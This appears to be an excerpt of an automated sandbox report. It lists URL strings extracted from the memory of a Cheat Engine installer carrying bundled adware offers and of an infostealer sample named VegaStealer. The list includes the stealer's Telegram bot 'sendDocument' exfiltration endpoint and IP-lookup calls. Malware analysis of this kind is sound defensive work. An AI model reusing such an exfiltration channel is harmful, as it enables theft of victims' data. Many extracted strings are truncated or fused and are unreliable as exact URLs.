Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://home.mcafee.com/Root/AboutUs.aspx?id=eula
Source: v2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipbase.com
Source: v2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipbase.com/xml/
Source: CheatEngine75.exe, 00000006.00000000.2043231186.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: CheatEngine75.tmp, 00000008.00000002.3310876008.000000000755F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policies
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policies67r
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policiesa.i
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policiesm/rsSt
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policiesm/rsStubActivator.exeages/969/EN.pngzip)yH
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reasonlabs.com/policiesx
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe
Source: CheatEngine75.tmp, 00000008.00000002.3310876008.000000000758A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe.
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe/jH
Source: CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zip
Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exem
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
Source: System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: https://system.data.sqlite.org/
Source: VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2187538856.00000000059F4000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr	String found in binary or memory: https://system.data.sqlite.org/X
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/VegaStealer_bot
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://t.me/VegaStealer_bot-/sendDocument?chat_id=
Source: System.Data.SQLite.dll.5.dr	String found in binary or memory: https://urn.to/r/sds_see
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webcompanion.com/privacy
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webcompanion.com/privacys/
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webcompanion.com/terms
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webcompanion.com/terms5/=
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.:wY
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.c
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.co
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.co_w
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/e
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/eu
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/eula
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/eula-avast-consumer-products
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/eula-avast-consumer-products2m
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/eula-avast-consumer-productshtmls/943/EN.pngipManage
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/p
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/privacy
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/privacy-policy#.
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avast.com/privacy-policyR/X
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avg.com/ww-en/eula
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.avg.com/ww-en/privacy..$
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ccleaner.com/about/privacy-policy
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ccleaner.com/legal/end-use
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ccleaner.com/legal/end-usecense-agreem
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ccleaner.com/legal/end-user-license-agreement
Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cheatengine.org/privacy.htm
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cheatengine.org/privacy.htmd
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.innosetup.com/
Source: CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/X
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/global/legal.html
Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D8C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.html
Source: CheatEngine75.tmp, 00000008.00000003.2210401005.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2392056677.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.html4
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnet
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSP
Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, History.txt.7.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.nortonlifelock.com/us/en/legal/license-services-agreement/
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.nortonlifelock.com/us/en/privacy/Op
Source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.opera.com/
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.opera.com/he/eula/computers
Source: CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.opera.com/he/eula/computersl
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.opera.com/he/eula/computersmq
Source: CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.opera.com/he/privacy
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CB6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/common/termsofservice-v1
Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/common/termsofservice-v1Replac
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005C90000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/privacy-policy
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/privacy-policy-
Source: CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/privacy-policyG
Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.premieropinion.com/privacy-policyl
